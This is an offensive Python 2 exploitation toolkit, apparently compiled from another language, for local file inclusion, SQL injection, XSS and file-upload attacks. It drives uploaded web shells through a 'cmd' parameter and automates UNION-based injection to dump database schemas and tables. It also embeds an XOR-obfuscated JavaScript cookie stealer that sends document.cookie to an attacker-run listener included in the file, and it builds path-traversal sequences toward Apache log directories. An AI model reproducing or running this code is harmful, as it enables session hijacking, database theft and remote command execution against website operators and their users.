LFI / SQLI / XSS / AFU

################################################################
# python file.py [exploitation strategy] [url] [inputs]
# Compiled from Aphid to Python by Boxelder 0.5.5926.31997
# https://github.com/John-Leitch/Aphid/releases
################################################################
def var_func_00000030(___p_op_8):
    return (___p_op_8.filename)

def var_func_0000002C(___p_op_7):
    return (___p_op_7 > 1)

def var_func_0000001D(___p_op_4):
    return (___p_op_4 != "<")

def var_func_0000001C(___p_op_3):
    return (___p_op_3 != "#")

def where(predicate, list):
    x = []
    for element in list:
        if predicate(element):
            (x.append)(element)
    return x

def select(selector, list):
    x = []
    for y in list:
        (x.append)(selector(y))
    return x

def selectMany(selector, list):
    x = []
    for y in list:
        for z in selector(y):
            (x.append)(z)
    return x

def flatten(list):
    def var_func_00000000(x):
        return x

    return selectMany(var_func_00000000, list)

def any(predicate, list):
    for element in list:
        if predicate(element):
            return True
    return False

def all(predicate, list):
    for x in list:
        if not predicate(x):
            return False
    return True

def first(predicate, list):
    for x in list:
        if predicate(x):
            return x

def distinct(list):
    x = []
    for y in list:
        if not (x.__contains__)(y):
            (x.append)(y)
    return x

def iter(action, list):
    for x in list:
        action(x)

count = len
def concat(list, otherList):
    x = []
    for y in otherList:
        (x.append)(y)
    for y in list:
        (x.append)(y)
    return x

def skip(count, list):
    x = []
    i = 0
    for y in list:
        if (i >= count):
            (x.append)(y)
        i = (i + 1)
    return x

def take(count, list):
    x = []
    i = 0
    for y in list:
        if (i < count):
            (x.append)(y)
        i = (i + 1)
    return x

def aggr(acc, list):
    if (len(list) == 1):
        return list[0]
    else:
        s = list[0]
        for x in skip(1, list):
            s = acc(s, x)
        return s

def join(sep, list):
    def var_func_00000001(x, y):
        return ((x + sep) + y)

    return aggr(var_func_00000001, list)

def addAll(list):
    def var_func_00000002(x, y):
        return (x + y)

    return aggr(var_func_00000002, list)

import os.path
class File():
    @staticmethod
    def appendAllText(filename, text):
        (File.writeText)(filename, text, "a")

    @staticmethod
    def writeAllText(filename, text):
        (File.writeText)(filename, text, "w")

    @staticmethod
    def writeText(filename, text, mode):
        file = open(filename, mode)
        (file.write)(text)
        (file.close)()

    @staticmethod
    def readAllText(filename):
        file = open(filename, "r")
        r = (file.read)()
        (file.close)()
        return r

    @staticmethod
    def exists(filename):
        return ((os.path).isfile)(filename)


class CharRange():
    @staticmethod
    def __alpha(start):
        def var_func_00000003(___p_op_0):
            return (___p_op_0 + 26)

        return (lambda var_00000000:select(chr, var_00000000))(range(ord(start), var_func_00000003(ord(start))))

    @staticmethod
    def alphaLower():
        return (CharRange.__alpha)("a")

    @staticmethod
    def alphaUpper():
        return (CharRange.__alpha)("A")

    @staticmethod
    def alpha():
        return (lambda var_00000001:concat((CharRange.alphaUpper)(), var_00000001))((CharRange.alphaLower)())


import json
class JsonRepository():
    repo = None
    def __init__(self, filename):
        (self.filename) = filename
        if (self.exists)():
            (self.read)()
        else:
            (self.repo) = dict()

    def exists(self):
        return (File.exists)((self.filename))

    def read(self):
        (self.repo) = (json.loads)((File.readAllText)((self.filename)))
        if not isinstance((self.repo), dict):
            (self.repo) = dict()

    def write(self):
        (lambda var_00000002:(File.writeAllText)((self.filename), var_00000002))((json.dumps)((self.repo)))

    def add(self, key, obj):
        (self.repo)[key] = obj
        (self.write)()

    def __getitem__(self, key):
        return ((self.repo).get)(key)

    def __setitem__(self, key, value):
        (self.repo)[key] = value


class ExploitComponent():
    def log(self, message):
        print(message)


import string
class HttpRequestTemplate():
    encode = True
    def __init__(self, url, query = None, post = None, file = None):
        (self.url) = url
        (self.query) = query
        (self.post) = post
        (self.file) = file

    def getUrl(self, values):
        s = ((((string.Template)((self.url)).substitute)(values)) if ((((self.url) != None) and (values != None))) else ((((self.url)) if (((self.url) != None)) else (""))))
        return ((((s + "?") + (self.getQuery)(values))) if ((self.hasQuery)()) else (s))

    def hasQuery(self):
        return (((self.query) != None) and (len((self.query)) != 0))

    def getQuery(self, values):
        return (self.__getData)((self.query), values)

    def getPost(self, values):
        return (self.__getData)((self.post), values)

    def getFile(self, values):
        def var_func_00000004(x):
            return HttpFile(((((string.Template)((x.name)).substitute)(values)) if ((((x.name) != None) and (values != None))) else ((((x.name)) if (((x.name) != None)) else ("")))), ((((string.Template)((x.filename)).substitute)(values)) if ((((x.filename) != None) and (values != None))) else ((((x.filename)) if (((x.filename) != None)) else ("")))), ((((string.Template)((x.data)).substitute)(values)) if ((((x.data) != None) and (values != None))) else ((((x.data)) if (((x.data) != None)) else ("")))), ((((string.Template)((x.type)).substitute)(values)) if ((((x.type) != None) and (values != None))) else ((((x.type)) if (((x.type) != None)) else ("")))))

        return ((None) if (((self.file) == None)) else ((lambda var_00000003:select(var_func_00000004, var_00000003))((self.file))))

    def __getData(self, data, values):
        if (data == None):
            return None
        result = dict()
        for k in data:
            result[((((string.Template)(k).substitute)(values)) if (((k != None) and (values != None))) else (((k) if ((k != None)) else (""))))] = ((((string.Template)(data[k]).substitute)(values)) if (((data[k] != None) and (values != None))) else (((data[k]) if ((data[k] != None)) else (""))))
        return (((urllib.urlencode)(result)) if ((self.encode)) else (result))


class HttpFile():
    def __init__(self, name, filename, data, type = "text/plain"):
        (self.name) = name
        (self.filename) = filename
        (self.data) = data
        (self.type) = type


import urllib2
from urllib import addinfourl
from urllib2 import HTTPRedirectHandler
class RedirectHandler(HTTPRedirectHandler):
    def http_error_302(self, req, fp, code, msg, headers):
        x = addinfourl(fp, headers, (req.get_full_url)())
        (x.status) = code
        (x.code) = code
        return x

    http_error_300 = http_error_302
    http_error_301 = http_error_302
    http_error_303 = http_error_302
    http_error_307 = http_error_302

(urllib2.install_opener)((urllib2.build_opener)(RedirectHandler()))
from random import choice
class MultipartFormData():
    dispositionPrefix = "Content-Disposition: form-data; "
    typePrefix = "Content-Type: "
    multiPartPrefix = "multipart/form-data; boundary="
    def __init__(self):
        (self.boundary) = (self.createBoundary)()
        (self.data) = ""

    def createBoundary(self):
        def var_func_00000005(x):
            return choice((CharRange.alpha)())

        return (lambda var_00000004:join("", var_00000004))((lambda var_00000005:select(var_func_00000005, var_00000005))(range(0, 64)))

    def getBoundary(self, final = False):
        return ((("--" + (self.boundary)) + (("--") if (final) else (""))) + "\r\n")

    def addBoundary(self, final = False):
        (self.data) += (self.getBoundary)(final)

    def addDisposition(self, name, filename = None):
        (self.data) += (((self.dispositionPrefix) + ((("name=\"{}\"".format)(name)) if ((filename == None)) else (("name=\"{}\"; filename=\"{}\"".format)(name, filename)))) + "\r\n")

    def addType(self, type):
        (self.data) += (((self.typePrefix) + type) + "\r\n")

    def addLine(self, value = None):
        (self.data) += (((value) if ((value != None)) else ("")) + "\r\n")

    def addData(self, name, data):
        (self.addBoundary)()
        (self.addDisposition)(name)
        (self.addLine)()
        (self.addLine)(data)

    def addFileData(self, name, filename, type, data):
        (self.addBoundary)()
        (self.addDisposition)(name, filename)
        (self.addType)(type)
        (self.addLine)()
        (self.addLine)(data)

    def getContentType(self):
        return ((self.multiPartPrefix) + (self.boundary))

    def __str__(self):
        return ((self.data) + (self.getBoundary)(final = True))


from urlparse import parse_qs
class Http(ExploitComponent):
    contentType = "Content-Type"
    contentLength = "Content-Length"
    dataName = "name"
    dataFilename = "filename"
    dataType = "type"
    data = "data"
    @staticmethod
    def request(url, postData = None, fileData = None):
        print(("[?] %s" % url))
        if (postData != None):
            print(("    " + str(postData)))
        def var_func_00000006(x):
            return ("{{ {}, {}, {} }}".format)((x.name), (x.filename), (x.type))

        if (fileData != None):
            tup = (lambda var_00000006:join(", ", var_00000006))((lambda var_00000007:select(var_func_00000006, var_00000007))(fileData))
            print(("    " + tup))
        if (fileData == None):
            return ((urllib2.urlopen)(url, postData).read)()
        else:
            formData = (Http.createFormData)(postData, fileData)
            body = str(formData)
            req = (urllib2.Request)(url)
            (req.add_header)((Http.contentType), (formData.getContentType)())
            (req.add_header)((Http.contentLength), str(len(body)))
            (req.add_data)(body)
            return ((urllib2.urlopen)(req).read)()

    @staticmethod
    def createFormData(postData = None, fileData = None):
        formData = MultipartFormData()
        if (postData != None):
            postValues = parse_qs(postData)
            for k in (postValues.keys)():
                for v in postValues[k]:
                    (formData.addData)(k, v)
        if (fileData != None):
            for f in fileData:
                (formData.addFileData)((f.name), (f.filename), (f.type), (f.data))
        return formData


class Payload():
    def __init__(self, value):
        (self.value) = value

    def inject(self, target):
        return (((target % (self.value))) if ((target.__contains__)("%s")) else (target))

    def injectData(self, target):
        if (target == None):
            return None
        data = dict()
        for k in target:
            v = target[k]
            data[(self.inject)(k)] = (self.inject)(v)
        return data


class Injection():
    def __init__(self, begin, end, nextExpression):
        (self.begin) = begin
        (self.end) = end
        (self.nextExpression) = nextExpression

    def __str__(self):
        return (((self.begin) + (self.nextExpression)()) + (self.end))


from random import randint
class Shell(ExploitComponent):
    def __init__(self, createUrl, createPost = None):
        (self.createUrl) = createUrl
        (self.createPost) = createPost

    def run(self, cmd):
        u = (self.createUrl)(cmd)
        p = (((self.createPost)(cmd)) if (((self.createPost) != None)) else (None))
        resp = (Http.request)(u, p)
        return resp

    @staticmethod
    def get(url):
        def var_func_00000007(cmd):
            return ((url + "?") + (urllib.urlencode)({"cmd": cmd}))

        return Shell(var_func_00000007)

    @staticmethod
    def post(url):
        def var_func_00000008(cmd):
            return url

        def var_func_00000009(cmd):
            return (urllib.urlencode)({"cmd": cmd})

        return Shell(var_func_00000008, var_func_00000009)

    @staticmethod
    def open(url):
        print("[i] Detecting shell input")
        probe = str(randint(268435456, 4294967295))
        probeCmd = ("echo %s" % probe)
        for f in [(Shell.post), (Shell.get)]:
            shell = f(url)
            result = (shell.run)(probeCmd)
            if (result.__contains__)(probe):
                print("[+] Shell input found")
                return shell
        print("[x] Could not find shell input")
        return None


class ExploitEncoding():
    key = [60, 159, 224, 114, 159, 230, 216, 94, 23, 190, 168, 12, 209, 198, 188, 191, 168, 255, 194, 242, 72, 124, 255, 231, 185, 153, 101, 80, 37, 111, 29, 106, 235, 199, 163, 78, 229, 209, 45, 102, 0, 23, 6, 208, 65, 8, 227, 181, 197, 44, 228, 1, 121, 189, 83, 192, 159, 248, 184, 5, 129, 136, 57, 167, 160, 62, 33, 9, 35, 109, 218, 214, 210, 92, 242, 49, 117, 47, 166, 177, 182, 175, 139, 248, 139, 27, 241, 46, 116, 226, 175, 237, 25, 39, 228, 120, 222, 94, 48, 3, 231, 217, 146, 88, 82, 13, 46, 28, 202, 34, 74, 112, 82, 7, 78, 209, 252, 64, 28, 132, 77, 242, 149, 64, 189, 236, 189, 170, 119, 122, 83, 23, 255, 162, 201, 221, 29, 51, 165, 125, 237, 212, 100, 81, 151, 63, 155, 17, 216, 19, 123, 157, 66, 171, 182, 245, 67, 81, 154, 102, 79, 131, 165, 80, 207, 51, 113, 175, 62, 113, 180, 201, 154, 158, 151, 120, 142, 67, 168, 126, 81, 172, 210, 100, 254, 181, 213, 83, 236, 212, 153, 203, 152, 63, 46, 105, 46, 19, 130, 100, 206, 235, 211, 103, 94, 178, 2, 163, 19, 61, 103, 0, 169, 28, 20, 163, 177, 65, 82, 25, 94, 29, 195, 105, 216, 233, 48, 91, 112, 45, 73, 122, 192, 68, 175, 101, 217, 106, 5, 76, 179, 49, 64, 174, 109, 153, 33, 124, 43, 138, 183, 237, 193, 105, 5, 177, 39, 105, 143, 116, 130, 167, 51, 229, 244, 236, 63, 100, 109, 174, 202, 71, 59, 5, 101, 44, 220, 21, 252, 63, 199, 180, 48, 229, 117, 92, 185, 87, 62, 254, 61, 111, 219, 144, 201, 12, 254, 90, 185, 128, 89, 189, 15, 124, 192, 112, 177, 187, 3, 216, 212, 18, 108, 80, 173, 206, 119, 77, 111, 151, 50, 231, 37, 110, 113, 90, 107, 170, 60, 89, 46, 130, 91, 123, 229, 10, 164, 180, 37, 5, 170, 253, 84, 102, 41, 43, 3, 138, 227, 251, 148, 177, 234, 34, 77, 114, 151, 160, 10, 102, 4, 7, 127, 169, 170, 82, 182, 240, 106, 162, 41, 195, 40, 106, 237, 53, 147, 191, 69, 69, 87, 224, 199, 64, 197, 125, 151, 57, 45, 115, 114, 4, 169, 191, 0, 163, 126, 170, 188, 215, 116, 18, 32, 64, 210, 209, 136, 128, 52, 24, 222, 216, 91, 196, 14, 35, 64, 62, 228, 44, 187, 125, 194, 247, 48, 36, 25, 105, 106, 73, 182, 233, 3, 109, 209, 68, 192, 134, 110, 243, 244, 22, 4, 21, 148, 154, 169, 228, 176, 220, 99, 63, 197, 143, 28, 246, 79, 40, 16, 173, 183, 31, 22, 235, 98, 245, 212, 237, 243, 202, 99, 185, 208, 241, 56, 164, 121, 173, 98, 149, 123, 53, 184, 141, 230, 119, 35, 115, 81, 218, 244, 152, 117, 193, 59, 212, 0, 25, 178, 159, 197, 187, 240, 230, 121, 169, 111, 212, 86, 119, 125, 161]
    @staticmethod
    def decode(value):
        i = 0
        decoded = ""
        for x in value:
            decoded += chr((ord(x) ^ (ExploitEncoding.key)[i]))
            i = (i + 1)
            if (i == len((ExploitEncoding.key))):
                i = 0
        return decoded


from urlparse import urlparse, parse_qs
from BaseHTTPServer import BaseHTTPRequestHandler
class ExploitRequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        uri = urlparse((self.path))
        rsrc = (self.getFile)((uri.path))
        query = parse_qs((uri.query))
        print(("[i] Path: %s" % (self.path)))
        print(("[i] Resource: %s" % rsrc))
        print(("[i] Referer: %s" % (self.getReferer)()))
        print(("[i] IP: {}:{}".format)((self.getIP)(), (self.getPort)()))
        hasContent = ((rsrc != None) and (rsrc != ""))
        if ((query != None) and (query != "")):
            (self.handleQuery)()
        else:
            if hasContent:
                (self.handleResource)()
        code = ((200) if ((((uri.query) != "") or hasContent)) else (404))
        (self.send_response)(code)
        (self.send_header)("Access-Control-Allow-Origin", "*")
        (self.end_headers)()
        if hasContent:
            ((self.wfile).write)(rsrc)
        print("")

    def log_message(self, a = None, b = None, c = None, d = None, e = None, f = None, g = None, h = None, i = None, j = None, k = None, l = None, m = None, n = None, o = None, p = None):
        0

    def handleQuery(self):
        print(("[i] Message: %s" % (self.getMsg)()))

    def handleResource(self, rsrc):
        (self.send_header)("Content-type", "text/javascript")

    def getIP(self):
        return (self.client_address)[0]

    def getPort(self):
        return (self.client_address)[1]

    def getUrl(self):
        return urlparse((self.path))

    def getQuery(self):
        return parse_qs(((self.getUrl)().query))

    def getMsg(self):
        q = (self.getQuery)()
        keys = (q.keys)()
        return (((ExploitEncoding.decode)(q[keys[0]][0])) if ((len(keys) != 0)) else (None))

    def getReferer(self):
        def var_func_0000000A(r):
            return ((r[0]) if ((len(r) != 0)) else (None))

        return var_func_0000000A(((self.headers).getheaders)("referer"))

    def getFile(self, path):
        if (len(path) == 0):
            return None
        name = path[1:]
        text = (((self.server).payloads).get)(name)
        return text


class ExploitResource():
    @staticmethod
    def getScriptTag(host, port, name):
        return ("<script src=\"http://{}{}/{}\" type=\"text/javascript\"></script>".format)(host, (((":" + str(port))) if (((port != None) and (port != ""))) else ("")), name)

    @staticmethod
    def getJsCookieStealer(host, port):
        return (("\r\n        // Todo: generate key and store in repo\r\n        var key = [0x3C,0x9F,0xE0,0x72,0x9F,0xE6,0xD8,0x5E,0x17,0xBE,0xA8,0x0C,0xD1,0xC6,0xBC,0xBF,0xA8,0xFF,0xC2,0xF2,0x48,0x7C,0xFF,0xE7,0xB9,0x99,0x65,0x50,0x25,0x6F,0x1D,0x6A,0xEB,0xC7,0xA3,0x4E,0xE5,0xD1,0x2D,0x66,0x00,0x17,0x06,0xD0,0x41,0x08,0xE3,0xB5,0xC5,0x2C,0xE4,0x01,0x79,0xBD,0x53,0xC0,0x9F,0xF8,0xB8,0x05,0x81,0x88,0x39,0xA7,0xA0,0x3E,0x21,0x09,0x23,0x6D,0xDA,0xD6,0xD2,0x5C,0xF2,0x31,0x75,0x2F,0xA6,0xB1,0xB6,0xAF,0x8B,0xF8,0x8B,0x1B,0xF1,0x2E,0x74,0xE2,0xAF,0xED,0x19,0x27,0xE4,0x78,0xDE,0x5E,0x30,0x03,0xE7,0xD9,0x92,0x58,0x52,0x0D,0x2E,0x1C,0xCA,0x22,0x4A,0x70,0x52,0x07,0x4E,0xD1,0xFC,0x40,0x1C,0x84,0x4D,0xF2,0x95,0x40,0xBD,0xEC,0xBD,0xAA,0x77,0x7A,0x53,0x17,0xFF,0xA2,0xC9,0xDD,0x1D,0x33,0xA5,0x7D,0xED,0xD4,0x64,0x51,0x97,0x3F,0x9B,0x11,0xD8,0x13,0x7B,0x9D,0x42,0xAB,0xB6,0xF5,0x43,0x51,0x9A,0x66,0x4F,0x83,0xA5,0x50,0xCF,0x33,0x71,0xAF,0x3E,0x71,0xB4,0xC9,0x9A,0x9E,0x97,0x78,0x8E,0x43,0xA8,0x7E,0x51,0xAC,0xD2,0x64,0xFE,0xB5,0xD5,0x53,0xEC,0xD4,0x99,0xCB,0x98,0x3F,0x2E,0x69,0x2E,0x13,0x82,0x64,0xCE,0xEB,0xD3,0x67,0x5E,0xB2,0x02,0xA3,0x13,0x3D,0x67,0x00,0xA9,0x1C,0x14,0xA3,0xB1,0x41,0x52,0x19,0x5E,0x1D,0xC3,0x69,0xD8,0xE9,0x30,0x5B,0x70,0x2D,0x49,0x7A,0xC0,0x44,0xAF,0x65,0xD9,0x6A,0x05,0x4C,0xB3,0x31,0x40,0xAE,0x6D,0x99,0x21,0x7C,0x2B,0x8A,0xB7,0xED,0xC1,0x69,0x05,0xB1,0x27,0x69,0x8F,0x74,0x82,0xA7,0x33,0xE5,0xF4,0xEC,0x3F,0x64,0x6D,0xAE,0xCA,0x47,0x3B,0x05,0x65,0x2C,0xDC,0x15,0xFC,0x3F,0xC7,0xB4,0x30,0xE5,0x75,0x5C,0xB9,0x57,0x3E,0xFE,0x3D,0x6F,0xDB,0x90,0xC9,0x0C,0xFE,0x5A,0xB9,0x80,0x59,0xBD,0x0F,0x7C,0xC0,0x70,0xB1,0xBB,0x03,0xD8,0xD4,0x12,0x6C,0x50,0xAD,0xCE,0x77,0x4D,0x6F,0x97,0x32,0xE7,0x25,0x6E,0x71,0x5A,0x6B,0xAA,0x3C,0x59,0x2E,0x82,0x5B,0x7B,0xE5,0x0A,0xA4,0xB4,0x25,0x05,0xAA,0xFD,0x54,0x66,0x29,0x2B,0x03,0x8A,0xE3,0xFB,0x94,0xB1,0xEA,0x22,0x4D,0x72,0x97,0xA0,0x0A,0x66,0x04,0x07,0x7F,0xA9,0xAA,0x52,0xB6,0xF0,0x6A,0xA2,0x29,0xC3,0x28,0x6A,0xED,0x35,0x93,0xBF,0x45,0x45,0x57,0xE0,0xC7,0x40,0xC5,0x7D,0x97,0x39,0x2D,0x73,0x72,0x04,0xA9,0xBF,0x00,0xA3,0x7E,0xAA,0xBC,0xD7,0x74,0x12,0x20,0x40,0xD2,0xD1,0x88,0x80,0x34,0x18,0xDE,0xD8,0x5B,0xC4,0x0E,0x23,0x40,0x3E,0xE4,0x2C,0xBB,0x7D,0xC2,0xF7,0x30,0x24,0x19,0x69,0x6A,0x49,0xB6,0xE9,0x03,0x6D,0xD1,0x44,0xC0,0x86,0x6E,0xF3,0xF4,0x16,0x04,0x15,0x94,0x9A,0xA9,0xE4,0xB0,0xDC,0x63,0x3F,0xC5,0x8F,0x1C,0xF6,0x4F,0x28,0x10,0xAD,0xB7,0x1F,0x16,0xEB,0x62,0xF5,0xD4,0xED,0xF3,0xCA,0x63,0xB9,0xD0,0xF1,0x38,0xA4,0x79,0xAD,0x62,0x95,0x7B,0x35,0xB8,0x8D,0xE6,0x77,0x23,0x73,0x51,0xDA,0xF4,0x98,0x75,0xC1,0x3B,0xD4,0x00,0x19,0xB2,0x9F,0xC5,0xBB,0xF0,0xE6,0x79,0xA9,0x6F,0xD4,0x56,0x77,0x7D,0xA1];\r\n        \r\n        var alphaNum = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\";\r\n        var nextInt = function(max) { return Math.floor(Math.random() * max); };\r\n        var nextChar = function() { return alphaNum[nextInt(alphaNum.length)]; };\r\n        \r\n        var nextName = function() {\r\n            var len = nextInt(0x10);\r\n            var name = \"\";\r\n            for (var i = 0; i < len; i++) name += nextChar();\r\n            \r\n            return name;\r\n        };\r\n        \r\n        var applyKey = function(value, key, apply) {\r\n            var keyIndex = 0;\r\n            var applied = \"\";\r\n            \r\n            for (var i = 0; i < value.length; i++) {\r\n                applied += apply(value.charCodeAt(i), key[keyIndex]);\r\n                if (++keyIndex == key.length) keyIndex = 0;\r\n            }\r\n            \r\n            return applied;\r\n        };\r\n        \r\n        var encode = function(value, key) {\r\n            return applyKey(value, key, function(v, k) {\r\n                return String.fromCharCode(v ^ k);\r\n            });            \r\n        };\r\n    \r\n        var xhr = window.XMLHttpRequest ? \r\n            new XMLHttpRequest() : \r\n            new ActiveXObject(\"Microsoft.XMLHTTP\");\r\n            \r\n        var sendValue = function(v) {\r\n            var k = nextName();\r\n            var qs = k + \"=\" + escape(encode(v, key));\r\n            xhr.open(\"GET\", \"http://{host}:{port}/?\" + qs, true);\r\n            xhr.onreadystatechange = function (e) {\r\n                if (xhr.readyState == 4 && xhr.status != 200) {\r\n                    console.log(xhr.statusText);\r\n                }\r\n            }; \r\n            xhr.send();            \r\n        };\r\n        \r\n        try {\r\n            sendValue(\"Cookie => \" + document.cookie);\r\n        } catch (err) { alert(err); }\r\n    ".replace)("{host}", host).replace)("{port}", str(port))


from random import randint, choice
from BaseHTTPServer import HTTPServer
class ExploitServerConfig():
    portKey = "port"
    cookieStealerKey = "cookieStealer"
    alpha = (CharRange.alpha)()
    serverRepo = JsonRepository("server.json")
    @staticmethod
    def nextPort():
        return randint(49152, 65535)

    @staticmethod
    def nextName():
        def var_func_0000000B(x):
            return choice((ExploitServerConfig.alpha))

        return (lambda var_00000008:join("", var_00000008))((lambda var_00000009:select(var_func_0000000B, var_00000009))(range(0, randint(4, 16))))

    @staticmethod
    def getPort():
        def var_func_0000000C():
            return (ExploitServerConfig.serverRepo)[(ExploitServerConfig.portKey)]

        return (ExploitServerConfig.getValue)(var_func_0000000C)

    @staticmethod
    def getCookieStealer():
        def var_func_0000000D():
            return (ExploitServerConfig.serverRepo)[(ExploitServerConfig.cookieStealerKey)]

        return (ExploitServerConfig.getValue)(var_func_0000000D)

    @staticmethod
    def getValue(f):
        (ExploitServerConfig.ensure)()
        return f()

    @staticmethod
    def ensure():
        if ((ExploitServerConfig.serverRepo)[(ExploitServerConfig.portKey)] == None):
            (ExploitServerConfig.generate)()

    @staticmethod
    def generate():
        (ExploitServerConfig.serverRepo)[(ExploitServerConfig.portKey)] = (ExploitServerConfig.nextPort)()
        (ExploitServerConfig.serverRepo)[(ExploitServerConfig.cookieStealerKey)] = (ExploitServerConfig.nextName)()
        ((ExploitServerConfig.serverRepo).write)()


class XssExploit():
    def __init__(self, server, tmpl):
        (self.server) = server
        (self.tmpl) = tmpl

    def __str__(self):
        if (((tmpl.post) != None) and (len((tmpl.post)) > 0)):
            print("[X] POST XSS not yet supported")
            quit()
        return (tmpl.getUrl)({"xss": ((self.server).scriptTag)})


class ExploitServer(ExploitComponent):
    port = (ExploitServerConfig.getPort)()
    cookieStealer = (ExploitServerConfig.getCookieStealer)()
    def __init__(self, ip):
        (self.ip) = ip
        endpoint = (self.ip), (self.port)
        (self.server) = HTTPServer(endpoint, ExploitRequestHandler)
        ((self.server).payloads) = dict()
        ((self.server).payloads)[(self.cookieStealer)] = (ExploitResource.getJsCookieStealer)((self.ip), (self.port))
        (self.scriptTag) = (ExploitResource.getScriptTag)((self.ip), (self.port), (self.cookieStealer))

    def createExploit(self, tmpl):
        return str(XssExploit(self, tmpl))

    def serveForever(self):
        (self.log)(("[?] Listening on {}:{}".format)((self.ip), (self.port)))
        ((self.server).serve_forever)()


class SqlEmitter():
    alpha = (CharRange.alpha)()
    def getChars(self):
        def var_func_0000000E(___p_op_1):
            return (___p_op_1 != (self.quote)())

        return (lambda var_0000000A:select(chr, var_0000000A))((lambda var_0000000B:where(var_func_0000000E, var_0000000B))(range(32, 128)))

    def tup(self, vals):
        def var_func_0000000F(x, y):
            return (((x + ",") + (self.space)()) + y)

        return (lambda var_0000000C:aggr(var_func_0000000F, var_0000000C))(vals)

    def words(self, words):
        def var_func_00000010(x, y):
            return ((x + (self.space)()) + y)

        return (lambda var_0000000D:aggr(var_func_00000010, var_0000000D))(words)

    def space(self):
        return " "

    def quote(self):
        return "'"

    def junkCharRange(self):
        def var_func_00000011(x):
            return choice((self.alpha))

        return (lambda var_0000000E:join("", var_0000000E))((lambda var_0000000F:select(var_func_00000011, var_0000000F))((lambda var_00000010:range(0, var_00000010))(randint(8, 32))))

    def junkString(self):
        return ("{1}{0}{1}".format)((self.junkCharRange)(), (self.quote)())

    def unionAll(self, cols):
        return (self.words)(["UNION", "SELECT", "ALL", (self.tup)(cols)])

    def comment(self):
        return "#"


class SqlUnionOutputInfo():
    def __init__(self, begin, end, columnCount, columnNumber):
        (self.begin) = begin
        (self.end) = end
        (self.columnCount) = columnCount
        (self.columnNumber) = columnNumber


class SqlUnionProbe(ExploitComponent):
    emitter = SqlEmitter()
    output = None
    begins = ["'", "\"", "-1 ", "0 ", ""]
    ends = ["#", "--", ""]
    def __init__(self, httpTemplate, maxColumns = 32):
        (self.httpTemplate) = httpTemplate
        (self.maxColumns) = maxColumns

    def findOutput(self):
        (self.emitter) = SqlEmitter()
        columns = 0
        (self.log)("[?] Searching for union count and output")
        def var_func_00000012(x):
            return ((self.emitter).junkString)()

        def var_func_00000013(x):
            return ((x.lstrip)(quote).rstrip)(quote)

        def var_func_00000014(___p_op_2):
            return (___p_op_2 != 0)

        while True:
            columns = (columns + 1)
            for begin in (self.begins):
                for end in (self.ends):
                    cols = (lambda var_00000011:select(var_func_00000012, var_00000011))(range(0, columns))
                    quote = cols[0][0]
                    colVals = (lambda var_00000012:select(var_func_00000013, var_00000012))(cols)
                    resp = (self.sendRequest)((self.createInjection)(begin, end, cols))
                    matches = (lambda var_00000013:where((resp.__contains__), var_00000013))(colVals)
                    if var_func_00000014(len(matches)):
                        offset = (colVals.index)(matches[0])
                        msg = ("\r\n[+] Output found: Columns={}, Offset={}\r\n".format)(columns, offset)
                        (self.log)(msg)
                        return SqlUnionOutputInfo(begin, end, columns, offset)
            if (columns >= (self.maxColumns)):
                return None

    def inject(self, columns, table, where = None):
        def hasOutput():
            return ((self.output) != None)

        if not hasOutput():
            (self.output) = (self.findOutput)()
        if not hasOutput():
            (self.log)("[X] Could not find output for injection\r\n")
            return None
        injector = SqlUnionInjector({"HOST": "localhost", "PORT": 80}, ((self.output).columnCount), ((self.output).columnNumber), columns, table, delimiter = ((self.output).begin), where = where, terminator = ((self.output).end))
        (injector.payload) = (injector.dump)
        resp = (self.sendRequest)((injector.str)())
        return (injector.finalize)(resp)

    def parseSchema(self, schemas):
        if (schemas == None):
            return None
        def var_func_00000015(x):
            return x[0]

        d = distinct((lambda var_00000014:select(var_func_00000015, var_00000014))(schemas))
        dbs = dict()
        def var_func_00000016(y):
            return y[1]

        def var_func_00000017(y):
            return (x == y[0])

        for x in d:
            dbs[x] = (lambda var_00000015:select(var_func_00000016, var_00000015))((lambda var_00000016:where(var_func_00000017, var_00000016))(schemas))
        return dbs

    def listSchemas(self):
        return (self.parseSchema)((self.inject)(["TABLE_SCHEMA", "TABLE_NAME"], "INFORMATION_SCHEMA.Tables"))

    def listColumns(self, schema, table):
        (self.log)("[?] Querying information schema for column names")
        whereTmpl = (" WHERE INFORMATION_SCHEMA.COLUMNS.TABLE_SCHEMA = '{0}' AND" + " INFORMATION_SCHEMA.COLUMNS.TABLE_NAME='{1}'")
        cols = (self.inject)(["COLUMN_NAME"], "INFORMATION_SCHEMA.COLUMNS", where = (whereTmpl.format)(schema, table))
        if (cols == None):
            (self.log)("[X] Could not query information schema\r\n")
            return None
        def var_func_00000018(x):
            return x[0]

        cols = (lambda var_00000017:select(var_func_00000018, var_00000017))(cols)
        def var_func_00000019(x):
            return (("[" + x) + "]")

        tup = (lambda var_00000018:join(", ", var_00000018))((lambda var_00000019:select(var_func_00000019, var_00000019))(cols))
        (self.log)(("\r\n[+] Columns found: %s\r\n" % tup))
        return cols

    def dumpTable(self, table, schema = None, columns = None):
        return (self.inject)((((self.listColumns)(schema, table)) if ((schema != None)) else (columns)), table)

    def sendRequest(self, injection):
        values = {"sqli": injection}
        return (Http.request)(((self.httpTemplate).getUrl)(values), ((self.httpTemplate).getPost)(values))

    def createInjection(self, begin, end, cols):
        def var_func_0000001A():
            return ((self.emitter).unionAll)(cols)

        return Injection(begin, end, var_func_0000001A)


class TraversalRange(ExploitComponent):
    def __init__(self, files, start, stop, dot = ".", separator = "/", terminator = ""):
        (self.files) = files
        (self.start) = start
        (self.stop) = stop
        (self.dot) = dot
        (self.separator) = separator
        (self.terminator) = terminator
        (self.file_index) = 0
        (self.i) = start

    def next(self):
        if ((self.i) < (self.stop)):
            i = (self.i)
            f = (self.file_index)
            (self.file_index) = ((self.file_index) + 1)
            if ((self.file_index) == len((self.files))):
                (self.file_index) = 0
                (self.i) = ((self.i) + 1)
            return (self.getTravSeq)(i, f)
        else:
            raise StopIteration

    def getTravSeq(self, len, file_index):
        p = (lambda var_0000001A:join((self.separator), var_0000001A))((self.files)[file_index])
        return ((((((self.dot) * 2) + (self.separator)) * len) + p) + (self.terminator))

    def __iter__(self):
        return self


class TraversalProbe(ExploitComponent):
    dirs = [["apache", "logs"], ["apache2", "logs"], ["etc", "httpd", "logs"], ["opt", "lampp", "logs"], ["usr", "local", "apache", "logs"], ["var", "log"], ["var", "log", "apache"], ["var", "log", "apache2"], ["var", "log", "httpd"], ["var", "www", "logs"], ["xampp", "apache", "logs"]]
